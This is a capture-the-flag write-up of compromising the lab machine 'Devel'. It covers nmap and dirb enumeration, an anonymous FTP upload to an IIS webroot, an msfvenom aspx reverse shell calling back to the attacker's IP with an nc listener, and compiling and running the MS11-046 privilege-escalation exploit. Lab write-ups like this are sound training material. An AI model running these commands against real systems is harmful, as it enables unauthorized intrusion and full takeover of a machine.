created by ch4p // 10.10.10.5
// Enumeration //
The initial foothold on Devel is fairly simple, but we do finally get to do a bit of privilege escalation. We’ll get to use some new tools and new protocols this go around. But to kick it off, we’ll be using the default nmap scan we’ve used on the two previous machines.
nmap -Pn -A -p- -v 10.10.10.5 -oG /home/rp/Desktop/Devel/nmap
From our output, we see only two ports open. FTP on 21, with Anonymous login allowed (oh goodie), and port 80 with Microsoft IIS. This is a good chance to try out one of my favorite tools, dirb. Sadly, we won’t get any useful results, but the syntax is useful to know regardless.
dirb http://10.10.10.5 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
// Exploitation //
Our other avenue is FTP. If you aren’t familiar with FTP, it has a unique set of commands that go along with it. This protocol is actually ran on two ports, 20 & 21, with commands being passed on 21 and data on 20. Let’s try an anonymous login.
ftp 10.10.10.5
Username will be anonymous, and Password can be literally anything.
It’s let us in, and we’re able to list directories. Let’s see if we can upload a file, using the ‘Put’ command.
And then we’ll browse to that file on the web server in our browser.
Success. So let’s try getting a reverse shell on there. We can use FTP for the transfer, and then execute the program by browsing to it. Hopefully. The web server is running Microsoft IIS, which runs code is asp/aspx. We’ll use msfvenom to create a shell to upload.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.23 LPORT=2901 -f aspx > totallysafe.aspx
nc -lvnp 2901
Replace the LHOST with your IP, jump back to your FTP session, and let’s upload this thing.
Note- When using FTP, if uploading a compiled program, picture, PDF ect. you’ll need to use Binary transfer mode.
// Privilege Escalation //
We’ve establishes a basic shell, however, we’re unable to access any of the user directories. Time to escalate. ‘systeminfo’ will give us a good snapshot of what state the machine is in.
So, priv esc shouldn’t be too rough. Right down near the bottom there, you’ll see ‘Hotfix(s): N/A’. That phrase should give anyone who has ever owned a computer night terrors. Let’s turn to the all knowing Google, with a quick search for our version number. Second result looks promising, MS11-046. Few house keeping steps, and we’ll have root.
sudo searchsploit -u
searchsploit -m 40564
sudo apt-get update
sudo apt-get install mingw-w64
The exploit quite handily comes with compiling instructions:
i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32
And now all that’s left is to upload it onto our target machine, and let the shells rain upon us. We’ll use FTP in binary mode for this.
It’ll place it into the C:\\inetpub\\wwwroot\\ directory by default, so just quickly navigate over, execute it, and we have system.
And our flags: